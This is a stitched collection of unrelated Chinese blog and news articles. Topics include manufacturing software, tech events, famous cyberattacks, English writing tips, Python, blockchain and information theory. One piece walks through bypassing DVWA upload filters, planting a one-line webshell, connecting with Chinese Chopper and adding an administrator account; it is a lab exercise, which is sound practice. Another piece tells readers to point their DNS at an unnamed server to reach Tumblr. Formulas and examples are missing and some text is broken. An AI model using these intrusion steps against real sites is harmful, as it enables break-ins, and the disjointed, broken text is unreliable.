新能源汽车行业解决方案，是面向于新能源汽车行业制造企业，针对电池、电喷、电机、电源、发动机、线束、变速器及整车等零部件制造的不同的生产要求，构建了一套集可追溯性、生产控制和企业级系统集成功能于一体的完整生产执行解决方案。

嘉益仕LitWise MES解决方案可以为企业提供工单管理、物料管理、生产管理、质量管理、设备管理、工艺管理、实时数据库管理、工厂数据集成分析、产品规范管理等主要功能，为企业打造新能源汽车行业智能化工厂，建立全价值链的协同制造管理平台。注重现场、关注用户体验和产线效率、重视现场实战演练。

通过实施该方案企业可获得如下收益：

1）支持生产全过程的可追溯性

建立产品从“材料->制片-装配-注液-化成-电芯-模组-包体”一个完整的计划执行流程；

2）支持工艺参数及设备参数的监控

帮助企业掌握全部关键工艺参数，同时通过构建各个车间的设备集成与采集，实现透明化管理及实时反馈生产进度数据；

3）支持完整的产品质量管理体系

包括信息化质量检测管理流程；系统将运用“大数据分析技术”，构建“数据-信息-知识-价值（智慧）”质量知识体系，建立经验教训知识库，实现知识共享。

4）实现多系统集成

MES与WMS、ERP、PLM等系统集成，实现计划与生产协同性和及时性问题，物料拉动生产，自动叫料以及保证工艺路径的实时性。

5）实现柔性化生产

支持多线生产和混线生产，一个订单在多条线体生产，一条生产线可以同时生产多种相似工艺的产品。

6）无纸化生产

帮助企业实现无工序卡，无检测入录信息等操作，员工直接在MES系统中录入或通过设备数采直接采集数据，以减少员工成本。

往期分享

由国家自然科学基金委员会、大连市人民政府主办，大连理工大学、大连市科技局、大连高新技术产业园区、中国科学院沈阳自动化研究所、大连市长海县人民政府、大连海事大学承办，獐子岛集团股份有限公司协办的“人工智能与水下机器人高峰论坛”今天在大连世博广场举行。

2018·人工智能与水下机器人高峰论坛现场

2018·人工智能与水下机器人高峰论坛现场

针对人工智能、水下机器人领域的尖端课题以及对于此项技术的深远意义，政府领导、专家、学者在论坛上探讨交流。专家、学者还就人工智能与水下机器人相关领域的科研成果同海洋牧场产业有机结合及针对该领域的核心科学问题、关键技术和前沿方向开展深入研讨。

中国工程院院士、美国计算机学会会士、中国计算机学会理事长高文致辞

国家自然科学基金委员会信息科学部常务副主任张兆田致辞

大连市人民政府副市长靳国卫致辞

中国工程院院士、大连理工大学校长郭东明表示，近年来，人工智能的迅速发展深刻改变了人类社会生活。去年四月，大连理工大学与獐子岛集团达成共识，成立“大连理工大学—獐子岛集团水下机器人联合实验室”，围绕水下机器人等海洋装备自动化领域关键共性技术问题开展协同创新，并就企业技术需求和难题、产品研发等方面开展联合攻关、联合项目申报、技术成果转化等深入合作。希望通过高峰论坛将人工智能与水下机器人相关领域的科研成果和海洋牧场产业有机结合，针对该领域的核心科学问题、关键技术和前沿方向开展深入探讨与实践。

中国工程院院士、大连理工大学校长郭东明致辞

在主题报告环节，中科院沈阳自动化研究所研究员张奇峰从石油平台服务、深海科考及救援打捞等领域系统分析了当前国际上水下机器人作业需求、作业技术及作业工具研究现状，全面介绍了水下机器人作业技术领域的发展历史及现状，并根据当前国际水下机器人作业技术研究热点对未来水下机器人作业技术发展趋势进行了思考。

在《水下通信与定位》分论坛，西北工业大学教授黄建国指出，水声通信是与海洋开发和海洋国土安全密切相关的重要技术。在众多水下通信物理场中，声场是唯一可实现中远程水下通信的物理场。他重点介绍了以声场实现水下通信的水声通信技术，并分析了水下声信道的特点以及克服其难点的技术路线，给出了当前水声通信的主要研究领域及目前所采用的通信技术。

专家学者探讨人工智能、水下机器人领域的尖端课题

2018·人工智能与水下机器人高峰论坛还举办了“水下通信与定位”、“水下机器人”、“水下信息感知”、“水下目标识别”等分论坛。本届大赛较第一届大赛，规模更大、参赛队伍和专家队伍较上一届数量更多、层次更高，汇聚了海内外人工智能与水下机器人相关领域开展了长期深入研究与实践的专家、学者，希望通过本次大赛和高峰论坛，推动我国机器人领域的产业实践及人工智能领域的科学研究。

在电影中，黑客利用计算机可以炸毁房屋，关闭公路，释放瘟疫还有引发女权运动。

也许有人认为，好莱坞的想象力很丰满，但现实是骨感的。

他们错了，因为在现实中，真实发生过同电影所描述的黑客行动，而且刺激程度绝对不亚于电影。

1、逻辑炸弹引爆西伯利亚

在1982年，在里根gov时代CIA发现了克格勃窃取从西方窃取技术已经很多年了。对此，美国中央情报局决定给克格勃设一个巨大的陷阱，而这个陷阱很有可能是历史上第一次使用的木马病毒。当时他们对于KGB要偷的东西已经有些了解，所以他们当时故意泄露出了一个“机密软件”：而这个“强大”的用来帮助调整天然气管道项目——CIA在软件里种下“逻辑炸弹”。

该软件的运行方式是如果切换到与初始不同的模式运行10万个周期后，逻辑炸弹将会启动。不过克格勃们不傻 – 他们检查他们偷的东西 – 但后来并没与发现什么异常。当时这个软件对于他们来说非常有帮助，刚好可以用在西伯利亚延伸到西欧的天然气管道建设项目中。

该程序在前几个月运行的很好（前面提到的10万次），但是在1982年6月，美国间谍卫星侦测到发生在西伯利亚管道建设工程工地一个非常大的爆炸。爆炸是3万吨，大约是五分之一投在广岛的原子弹的威力。当时美国的内刊描述，这是“从太空看到的最巨大的非核武器爆炸”。

2、一台笔记本电脑让国防部的膝盖中了一箭

美国军方计算机网络被一种称为Agent.btz的蠕虫病毒入侵，而这个蠕虫来自于驻扎在阿富汗的一台笔记本电脑上，然后由优盘传播，成功进入被军方中央司令部。接下去，Agent.btz盗取了美国国务院和国防部的秘密材料，然后把这些绝密信息反馈给了未知的主人。

美国国防部马上启动了应急响应，由网军部门通过绝密网络隔离和删除恶意代码。可是Agent.btz有能力来扫描计算机以查找数据，然后打开后门，把自己复制到其他的网络，继续传输的数据和制造后门。此外，Agent.btz不断突变，下载新的代码来改变它的“签名”和逃避检测。后来更新，更复杂的变种Agent.btz出现在网络里，潜伏一年半之后，再次开始偷取机密文件。

最后你猜怎么着？美国军方采取了最原始的办法，将数百台电脑脱机，并重新格式化重装，然后把成千上万受感染的U盘全部销毁。最后才算勉强战胜了这个病毒。

3、黑客“绑架”医疗记录并索取钱财

在2012年7月，一组黑客入侵了一个外科医生在医疗实践中的计算机网络，然后将整个数据库中病人的医疗记录和其他敏感文件进行加密处理，让其他人永远都看不到。之后黑客发布了一条信息说如果缴纳足额的赎金，才会将数据库恢复。然后外科医生们关闭了服务器，与警方联系，并通知他们的客户他们的信息已被泄露。

同样在2008年，处方药公司Express Scripts收到一封电子邮件，其中有75家客户的社会安全号码和处方记录，要求付出指定金额，以保持信息安全。当然，ExpressScripts决定，把其客户的利益放在第一，并拒绝支付，然后通过电子邮件告诉70万个他们的客户让他们知道，他们的信息已经可能被偷走。

4、病毒间谍

它被称为火焰，这是一个大小为20兆的恶意程序，运行在几个中东国家特别是伊朗。火焰可以复制数据文件，捕捉敏感的截图，下载即时通讯单，远程开启计算机的麦克风和摄像头，记录正在发生在它附近任何谈话。

火焰接收命令和数据通过蓝牙系统，而且它也有天生的能力：假凭证，以避免被发现。它执行一个不起眼的加密技术被称为前缀碰撞攻击。另外它还可以将自己从被感染的计算机自动删除并毁灭它的所有痕迹。

火焰在头五年时间里伪装成Microsoft软件更新，直到后来偶然的一次机会才在伊朗被发现。伊朗指控美国和以色列的是他们制造了火焰，但是这两个国家不承认是它们干的。

5、 只针对伊朗核电厂的Stuxnet病毒

正如我们前面提到的第一项，事实证明，除了虚拟世界的东西，黑客同样会可以毁灭现实中的物体。2010年6月，一个名为Stuxnet处于休眠状态的病毒被世界各地的工厂、发电厂和交通控制系统的网络发现。奇怪的是，在每一个发现该病毒的系统中，这个病毒不会做任何事：就像是僵尸一样，但事实证明，Stuxnet正在等待。

病毒在一般情况下，只是像一个狼人一样暴力的破门而入，并开始破坏东西。 Stuxnet病毒则不同：它有一个特定的目标 – 伊朗的铀浓缩设施：位于纳坦兹的离心机，它的破坏性只能在那里被激活。后来事实证明，这些Stuxnet病毒控制了30％的纳坦兹设施的计算机，伊朗最后承认该病毒的存在，并暂时关闭了核设施和核电厂。

Tumblr是目前全球最大的轻博客网站，也是最受年轻人欢迎的博客网站，

在Tumblr上可以看到很多好玩，有趣的视频，接下来，告诉大家一个不用翻窗户，就能上Tumblr的方法。

只要三步哦！

1.找到自己的无线网络，点击无线网旁边的“！ ”

2.点击配置DNS，选择手动；

3.点击添加服务器，输入“123.207.137.88”

完成以上三步，就能轻松访问Tumblr，而且速度还很快哦！

REC

文/小卓老师

你好

欢迎来到小酌小卓

此刻你正在考场上

看到作文题是人工智能

你兴奋至极，因为这和你四个月前

凭直觉预测的完全一致

你思如泉涌，却下笔如有坑

你本想写人工智能颠覆了我们的生活

“人工智能”还可以用AI勉强对付

“颠覆”却怎么都想不出该用哪个词

最后只能用change将就一下

不料下一句又被“前所未有的体验”卡住了

要不写成“具有划时代的意义”？

时代可以用times，这个划……咳咳

你百感交集，开始责怪自己

为什么我的单词量这么小？

为什么关键时刻总是掉链子？

为什么我明明有直觉会考人工智能

却没有去找篇范文背下来？

终于，你惊醒过来，一身冷汗

还等什么，背单词去，毕竟还有四个月呢

恭喜你，你已经进入单词怪圈

还有4分30秒，我们解释一下什么意思

简单地说

就是你把所有问题都归为单词问题

于是你的所有行为都停留在背单词

单词没背到死去活来的程度

绝对不敢也绝对不愿做其他

类似的情况还有很多

比如语法没搞定之前绝对不碰阅读写作

比如发音只要有半点错绝对不聊口语听力

很多人都在这种怪圈里

所以会让你以为在这种怪圈很正常

很多老师还在不停的打造升级这种怪圈

因为他们需要竭尽全力证明所教授科目的重要

这种怪圈是种病，它会让你窒息到怀疑人生

而这种病的病根

在于把整体问题的根源归于一个局部

且希望通过不断应对局部来彻底解决整体

还有3分30秒，我们不求根治

只看这个具体的局怎么破

首先，你必须认识到

这个局的实质绝对不是

要背多少单词才能够在写作时游刃有余

而是写作时遇到不会的词应该怎么办

其实，心法就藏在阅读中

叫同义替换，英文叫paraphrase

说人话就是

把想表达的中文变简单

变到你能用英文表达为止

然后再去升级你的英文表达

遗憾的是很多人

要么把写作等同于翻译，卡在了第一步

或者即便实现了用英文表达，又忘记了升级

导致整体语言质量堪忧，死在了第二步

还有3分钟，我们举个例子

假设你想表达“暧昧”

你其实并不是要找一个最精准的词

而是想描述一种

“比朋友多一点但比恋人少一点的”状态

于是你想到了more than but less than

于是于是你想到了朋友(friends)和恋人(lovers)

你写出了They are more than friends but less than lovers.

但是请你千万别忘记“升级”

此时你不应该再关注“暧昧”

而只应该考虑

这句英文怎么才能变得让你获得高分

首先不能出错

为了花式炫技把恋人说成情人(lover)

通常属于no zuo no die

好歹改成情侣a couple可保你全句平安

如果你想增加存在感

可以召唤出百用不厌的定语从句

写成They are in a (situation)也可以用(position) which is more than friendship but less than romance.

还有2分钟，我们回到文章开头

如果你想表达“颠覆”

你可以替换成“完全超越人类想象的改变”

AI has changed our life in ways (that is) completely beyond our imagination.

如果你想表达“前所未有”

你可以替换成“历史中完全找不到痕迹”

AI has put us in a position where no trace can be found in history,

如果你想表达“划时代的意义”

你可以替换成“在历史中留下记号”

这句我不剧透答案

只给你两个提示：

mark the history和make the history

你可以试着把你的想法写在留言里

还有1分钟，我们玩个大的

别看到它是古文就溜了溜了

因为重点从来都不是精准翻译

而是同义替换

替换到我们可以用英文表达为止

什么是“当局者迷，旁观者清”

就是“外面的人比里面的人看的更清楚”

你很容易想到外面(outside)和里面(inside)

自然也不难想到外面的人(outsidersnsiders)

写出下面这句

应该都不算费力

问题是要怎么升级

首先不能出错

clearly表达的是具体的清晰

所以这句话很容易给人感觉是

外面的人比里面的人视力好

一首囧囧囧囧囧囧囧囧囧囧囧囧囧囧囧送给你

我们要表达的其实是

外面的人看真相比里面的人更明白

于是可以调整成

这样基本就安全了

不过稍微有点语感也会发现

二元对立的世界里没必要两个对象都写出来

如同我们只会说“外面那个同学麻烦你进来”

而不会写“外面那个同学而不是里面那个同学，麻烦你进来而不是出去”

我们那个年代有首歌叫《白天不懂夜的黑》

我想你应该不会写成

《白天不是晚上不懂夜而不是白天的黑而不是白》

所以既然说了outsiders就没必要再提insiders

句子可以精简成

当然，中国古语，玄妙至极

哪有什么真相，谁都只是看到了真相的一部分

于是我们去掉the truth

变成

写完收工，下面是签名合影环节

大家不要乱，不要乱

………………

这段不是说你非要写成这个样子

只是想告诉你它可以写成这个样子

所以你不妨试试，万一成功了呢

开始练习吧

这可是关键时刻能救命你的技能

因困难与迷茫更加执着

为梦想而奋斗坚定

勇敢的去做一个笨笨的自己

专业

唐迟老师

公众号：唐迟老师

唐迟老师个人公众号

导语

近日，清华经管学院EMC讲席教授、管理科学与工程系陈国青教授等在《管理科学学报》（2018年7月刊）撰文，就管理决策情景下大数据相关的研究与应用挑战及其新型范式（大数据驱动范式）进行了论述。

关键词：大数据特征、大数据驱动范式、全景式PAGE框架、数字化生活、管理决策

研究综述

首先，文章从数字化生活乃至大数据时代的背景出发，指出随着数据世界可以越来越多地反映现实世界，许多传统的管理正在变成数据的管理，许多传统的决策正在变成基于数据分析的决策。这对于管理学研究也正在产生深刻影响。

接着，文章阐述了大数据的特征，从大数据的数据特征、问题特征、管理决策特征的视角旨在回答三个基本问题：一，从信息技术范畴来看，大数据具备什么数据属性？二，从研究和应用问题特点来看，什么样的问题可以称作大数据问题？三，从管理者关注来看，管理决策大数据问题具有哪些关注视角？特别地，一个问题可以被看作是一个大数据问题，其应该至少具备粒度缩放、跨界关联、全局视图等要素特点。

进而，文章描述了大数据驱动范式所体现的“数据驱动+模型驱动”的“关联+因果”内涵。概括说来，大数据驱动范式可以从三个方面来审视：外部嵌入、技术增强、使能创新。大数据驱动范式通过技术增强引入新视角，进而推动了新型变量关系、要素机理和理论模型构建，并提升了大数据使能创新的价值创造。

最后，文章勾勒了一个全景式PAGE框架，给出了大数据驱动的管理与决策研究在决策理论、分析技术、资源治理、使能创新等领域的一系列重要研究方向。

获取全文

扫描下列二维码获取《管理决策情景下大数据驱动的研究和应用挑战——范式转变与研究方向》全文

供稿：科研事务办公室

封面图片来自网络，版权归原作者所有

编辑：韩小旭

审核：时曼琳

9月2日，备受瞩目的2018“赢在东莞”全球大数据创新创业大赛闭幕，来自硅谷的氪云信息团队最终夺冠。东莞市委副书记、市长肖亚非出席颁奖典礼并致辞。东莞市委常委、宣传部部长杨晓棠参加活动。

2018“赢在东莞”全球大数据创新创业大赛由东莞市政府主办。作为一场面向全球大数据领域高端人才的赛事，2018“赢在东莞”全球大数据创新创业大赛于7月份正式启动。参赛项目所处领域以大数据、人工智能、物联网为主，项目所处行业则以供应链、金融、电子商务为主。比赛经过初选、竞技、复赛环节的层层筛选，共有82个团队进入竞技环节，37个团队进入复赛，最终7个团队入围决赛。决赛于9月1日和2日展开，最终，氪云信息团队获得评审委员一致认可，成为本次全球大数据创新创业大赛的冠军，获得100万元的奖金。DataBeyond团队和Locus Social团队则分别获得亚军和季军。

东莞市委副书记、市长肖亚非致词

肖亚非在致辞中指出，本次大赛为东莞大数据行业加注产业发展驱动力，提升了东莞大数据产业水平。希望获奖的团队和项目有条件可以落户东莞，在这里实现落地发展，东莞市将给予大力支持。

肖亚非强调，东莞一直在大数据产业上为全省全国探路，并出台了相关政策措施力促大数据产业快速发展。东莞拥有深厚的制造业基础，下一步将加强与大数据等领域企业的合作，推动大数据等新技术与制造业“嫁接”，助推东莞产业的转型升级。

来源 |东莞时间网

编辑 | 水乡妹

Python是一个非常好用的程序语言，开发的速度非常快。Python的设计哲学是优雅、明确、简单。因此，Perl语言中总是有多种方法来做同一件事的理念在Python开发者中通常是难以忍受的。

Python开发者的哲学是用一种方法，最好是只有一种方法来做一件事。在设计Python语言时，如果面临多种选择，Python开发者一般会拒绝花俏的语法，而选择明确的没有或者很少有歧义的语法。

由于这种设计观念的差异，Python源代码通常被认为比Perl具备更好的可读性，并且能够支撑大规模的软件开发。这些准则被称为Python格言。在Python解释器内运行import this可以获得完整的列表。

Python开发人员尽量避开不成熟或者不重要的优化。一些针对非重要部位的加快运行速度的补丁通常不会被合并到Python内。所以很多人认为Python很慢。不过，根据二八定律，大多数程序对速度要求不高。在某些对运行速度要求很高的情况，Python设计师倾向于使用JIT技术，或者用使用C/C++语言改写这部分程序。可用的JIT技术是PyPy。

Python是完全面向对象的语言。函数、模块、数字、字符串都是对象。并且完全支持继承、重载、派生、多继承，有益于增强源代码的复用性。Python支持重载运算符和动态类型。相对于Lisp这种传统的函数式编程语言，Python对函数式设计只提供了有限的支持。有两个标准库(functools,itertools)提供了Haskell和Standard ML中久经考验的函数式程序设计工具。

虽然Python可能被粗略地分类为“脚本语言”(script language)，但实际上一些大规模软件开发计划例如Zope、Mnet及BitTorrent，Google也广泛地使用它。Python的支持者较喜欢称它为一种高级动态编程语言，原因是“脚本语言”泛指仅作简单程序设计任务的语言，如shellscript、VBScript等只能处理简单任务的编程语言，并不能与Python相提并论。

Python本身被设计为可扩充的。并非所有的特性和功能都集成到语言核心。Python提供了丰富的API和工具，以便程序员能够轻松地使用C语言、C++、Cython来编写扩充模块。Python编译器本身也可以被集成到其它需要脚本语言的程序内。因此，很多人还把Python作为一种“胶水语言”(glue language)使用。

使用Python将其他语言编写的程序进行集成和封装。在Google内部的很多项目，例如Google Engine使用C++编写性能要求极高的部分，然后用Python或Java/Go调用相应的模块。

《Python技术手册》的作者马特利(Alex Martelli)说：“这很难讲，不过，2004 年，Python已在Google内部使用，Google召募许多Python高手，但在这之前就已决定使用Python，他们的目的是Python where we can,C++ where we must，在操控硬件的场合使用C++，在快速开发时候使用Python。”

Python编译器推荐

学习Python推荐用以下开发工具，请根据自己的喜好，选择一种。

一

编辑器

vim

atom

sublime text

Visual Studio Code

二

集成开发环境

pycharm Python集成开发环境

wingide Python集成开发环境

liclipse Python集成开发环境

来源：电子产品世界

What？游戏你都玩腻了？那么区块链游戏你玩过么？

区块链游戏可能大多数游戏玩家都没有听说过吧。众所周知，区块链技术是非常的神秘与新潮了，那么基于区块链技术下的游戏呢？对于这一种新型的游戏，热爱游戏的你们想不想尝试一下呢？额… …先别着急，区块链游戏目前只是个小Baby，还没有完全的长大成人，我们先憧憬一下区块链游戏的未来吧！

区块链的游戏创造者们给我们勾勒出了一幅非常美丽的蓝图，对于我们这些游戏迷来说是很吸引的，未来区块链游戏与传统游戏是有很大的不同的，给玩家们创造出了很大的自由空间，相对于传统游戏而言，区块链游戏开发商对游戏的操控会减弱，而玩家对游戏角色的代入则更强。还有，区块链游戏的道具和商品是有严格规定的，不能乱改。玩家的道具、武器、服装，都将真正成为玩家的资产，而不是现在这样，本质上其实是游戏开发商的一串电脑随机数字。

哇！是不是超级期待呢？嗯哼！淡定… …都已经说过了，区块链游戏现在只是起步阶段，未来的路依旧是任重而道远呀！

有些玩家会问了，既然是在起步阶段，那肯定是没什么游戏可以嗨的喽~

蛤？虽然是在起步阶段，但已经出现了爆款！CryptoKitties就是一款非常火爆的区块链游戏，又称为“加密猫”、“链养猫”，是一款典型的养成类游戏。玩家在游戏中可以养育、买卖并繁育电子小猫，每只小猫都是独一无二的，这就让玩家有利可图。又能玩游戏又有钱可以赚，就问你心动不！现实中，也的确如此，加密猫2017年11月28日上线，单只小猫的交易额由最初的0.03ETH（约21美元），升到最高超过80万人民币每只，并且成功交易了。

啊啊啊，我想静静… …

可惜如此火爆的游戏，却迅速昙花一现了，就目前而言呢，用户对它的兴趣在不断下降，短短半年后，今年的6月份，它的交易量竟然下降了98.4%，是不是很不可思议。不过呢，在小编看来这也是意料之内的事。

为什么这么说呢？CryptoKitties是区块链游戏初始的代表，作为第一代爆款，它各方面都不够成熟，反映了区块链游戏的许多不足之处。首先，以太坊的交易速度压力山大，因为这些“喵星人”导致交易出现了拥堵，pending交易居高不下。而且，就游戏本身而言，可玩性实在是太低了，玩法过于简单，开创性和独特性在它身上体现的不够充分。Copy它也没有门槛，随着它的火爆，类似的游戏雨后春笋，养猫还是养狗，养鸭还是养鹅，让人选择困难。于是，云养猫的热度迅速消减了。

区块链游戏目前只是起步阶段，所以说存在问题也是再正常不过了，万事开头难嘛。作为一种新技术，区块链还是值得期待的，特别是在游戏领域，正在积极的实践与应用当中。游戏开发者们正在努力把它打造成一种生态，属于区块链游戏的生态。看过斯皮尔伯格的《头号玩家》的人，必会对电影中的绿洲Oasis那种身临其境的美妙体验过目不忘吧！也许，那种充满未来感的游戏场景，将在区块链游戏的生态中成为现实。

好啦，说了这么多，可能就是小编对区块链游戏的小小崇拜吧，毕竟小编也是个游戏迷，对区块链的未来还是充满期待的！希望区块链游戏能够不负众望，赶紧打造出另一个爆款，或者开发出区块链上的王者荣耀。如果你还没有涉足区块链游戏，那么就请你翘首以待啦！

预计阅读5分钟

本文1721字32图

我叫Dora，可能因为喜欢看哆啦A梦（Doraemon），就给自己起了这个昵称。

目前是一名在校学生，有自己的信仰与爱好，平时喜欢弹着吉他唱着歌亦或在电脑面前独自享受着汲取知识的快乐。

暑假两个月忙忙碌碌，写了很多笔记文章都没有时间发出来，昨天在DVWA下练习了文件上传漏洞的绕过与简单的提权操作，今天在这里把记录下来的笔记与问题和大家分享一下。

另外，本公众号对应的博客近期将会开通，域名还在备案审核中，敬请期待

二、DVWA文件上传漏洞演示（演示环境：kali、Metasploitable2）

1、低安全级别下

a) 来到上传位置，先上传一张图片试试。

b)提示不能上传文件，这是因为文件太大的原因，打开Burp，修改上传文件大小参数。

c)提示文件上传成功，打开图片试试。

d)以同样的方法上传木马文件，如果上传木马文件过大，同样可以使用Burp进行绕过。

e)命令正常执行,下面是低级安全下的源代码。

2、中等安全级别下

a)先选一张能够被上传的图片上传测试，再上传1.php测试。

b)图片被正确上传，php文件未被上传，把php文件后缀改为jpg再测试。

c)上传成功并且可被正常执行。

d)其实使用Burp中间代理截断修改数据包也可以实现这样的功能，参照对比正常上传的数据包进行修改上传数据，下面为源码：

3、高安全级别下

a）查看源代码发现只对扩展名进行绕过，于是乎上传一个jpg的木马试试。

b）上传并且执行成功。

三、菜刀演示（演示环境：win7、kali）

接下来就到本文的重头戏了——菜刀的利用，因为平时使用kali与Metasploitable2习惯了，Win下操作都是一样的。

1、先按照上文操作上传个一句话木马，然后使用菜刀进行连接。

2、在终端下新建用户并添加到管理员组中

3、因为只开了一台win7,所以这里在kali下使用rdsektop进行远程桌面的连接（效果和windows下的远程桌面一致，使用-f可全屏，关于rdesktop的使用后期会出一篇文章进行讲解）。

4、在terminal里输入rdesktop [target ip]将会弹出一个远程桌面连接的弹窗。

因为我事先已经把目标主机上开启了允许远程桌面连接的选项，现实中可不会那么顺利滴。

本人水平有限，文中难免有疏漏之处，欢迎留言一起交流

为什么中国的程序员不能用中文来编程？今天可算明白了

说起编程，那绝对是人类的一个福音。现在涉及到我们生活的方方面面，比如你现在正在浏览的网址，你使用的APP等，都是由程序员一个代码一个代码敲打出来的。这些事情，只能是那些逻辑思维比较敏捷的宅男才喜欢做吧。不管编写程序的过程多么复杂，只要是给我们带来了便捷，那就非常好了。可是大家有没有发现，不管用的电脑还是手机，等出现“故障”的时候，总会出现一些看不懂的英文字母。如果这些是汉字的话，我们是不是就可以轻而易举的修复呢？

这要先说一下编程了，现在的编程软件全部都是英文是因为计算机技术最先产生于美国。我们现在使用的操作系统基本上都是国外的。而且因为英文的字符也有其自身的优势，只需要26个字母加上阿拉伯数字就可以表达所有的想法了。汉字虽然很美丽，但是由于近义词或者相近意思太多，无法准确的去描述一个操作步骤。

其中一个原因就是，计算机原理是二进制，它并不懂任何人类的语言，只懂得0和1。所以不管人们使用人类什么语言编程，都需要计算机把它翻译成自己能看懂的0和1，实在是太笨了。我们国家其实也尝试过使用汉语编程，也有一个编程平台。不过只适合于小孩子们初级入门使用。

就像汉语等级考试一样，如果用这个与编程，不仅计算机会疯掉，就连我们自己也会疯掉。请解释下文中每个“意思”的意思——阿呆给领导送红包时，两人的对话颇有意思。领导：“你这是什么意思？”阿呆：“没什么意思，意思意思。”领导：“你这就不够意思了。”阿呆：“小意思，小意思。”领导：“你这人真有意思。”阿呆：“其实也没有别的意思。”领导：“那我就不好意思了。”阿呆：“是我不好意思”。

其实不管怎样，只要是计算机能最大限度的服务于我们人类，管他使用什么样的编程语言。既然中文编程需要耗费跟多的财力物力，为什么还要费尽心思研究出来呢？不过相信不久的将来，一定会有人会研究出来。就像我们的五笔一样，照样用起来方便快捷。

“渝中区将与相关区块链企业合作，用区块链技术搭建食药品安全追溯平台。”重庆日报记者9月2日从渝中区获悉，在日前重庆市区块链产业创新基地举行的企业沙龙活动中，20多家入驻企业就区块链产业进行交流，拟成立重庆市区块链产业联盟。

位于渝中区“大坪-石油路-化龙桥”片区的重庆市区块链产业创新基地自去年11月成立以来，截至目前已有21家区块链企业入驻，5家区块链企业、1家实验室、1家研究院和3家孵化器公司即将入驻，基地现已形成产学研用协同、多链条发展、复合式运营的发展状态。

在当天沙龙活动上，入驻区块链产业创新基地的各家企业分别介绍了业务发展方向，并与渝中区经信委、科委及大石化管委会负责人进行沟通，讨论成立重庆市区块链产业联盟事宜，计划在基地内建立区块链技术与应用重点实验室和“人工智能+区块链”青少年免费科普体验中心。

“区块链技术将很快运用到本地政务管理及实体经济中。”渝中区经信委负责人表示，渝中区将与入驻区块链基地的企业合作，利用区块链技术为该区食药监部门搭建追溯平台，助其加强对食药品的安全监管。（记者 夏元）

文章来源于网络，版权归作者所属

一些信息论的基础和机器学习中常见的概念和解释。

一、信息熵 又 香浓熵

首先，熵 描述的是混乱程度、不确定性程度，越混乱，越不确定，熵越大，越规整，越有序，熵越小。

简单理解信息的不确定性越大，信息熵就越大，信息的不确定性越小，信息熵也就越小。

如果一个随机变量X的可能取值为

，其概率分布为

，则随机变量X的熵定义为H(X)：

二、条件熵

条件熵：表示在已知第二个随机变量 X 下第一个随机变量 Y 信息熵的大小。

条件熵可以类比条件概率，他表示：在随机变量 X 的基础上我们引入随机变量 Y，假设 Y 和 X 有一定的关系。那么 Y 的信息熵会相对减小。

条件熵还是很好理解的吧！不理解吗？还是结合足球的例子，比如你知道其中一个队是铁定不会赢的了，那你要现在要猜那个队会赢，那个难度就下降了是吧，因为信息熵下降了！

条件熵=联合熵 - 信息熵

而知道知道条件熵之后，信息增益就很简单了，信息增益：就是：

，表示的就是条件熵和原来熵的差值。（注意：信息增益也是相对熵的一个别称，指用来描述两个概率分布Ｘ和Ｙ差别的非对称性的度量，下面讲相对熵）

上面是信息论的基础，而信息增益也是在机器学习中有很多的应用，比如在ID3算法中，衡量最佳特征的标准就是信息增益。

三、相对熵（KL散度）

KL散度:是两个概率分布P和Q差别的非对称性的度量。

KL散度是不对称的！！！

注意：在神经网络中，很多时候需要衡量两个分布的差异，就将一个看成真实分布，一个表示模型输出分布，这样来训练模型，也就是下面的交叉熵：

交叉熵：用来衡量在给定的真实分布下，使用非真实分布所指定的策略消除系统的不确定性所需要付出的努力的大小。而交叉熵和相对熵的关系如下：

相对熵=交叉熵-信息熵：

相对熵和交叉熵也是一个非常重要的概念，比如机器学习中有个交叉熵损失函数，用了交叉熵的重要性质，比如在GAN模型中，KL散度也是解释GAN原理的重要基础。

四、互信息

互信息：测量训练数据中x与y的相关度。

而在机器学习中，该算法可能会使得我们选择的都是与标签y强相关的特征值，从而进行特征选择。

Desicion Tree（决策树）的IG一般是指KL散度的期望，然后正好就是互信息。

五、常用距离

之前总结过的 闵可夫斯基 以及 余弦夹角等

六、图论

图 变 度 等基本理解

七、树论

树构建、根、节点、叶节点等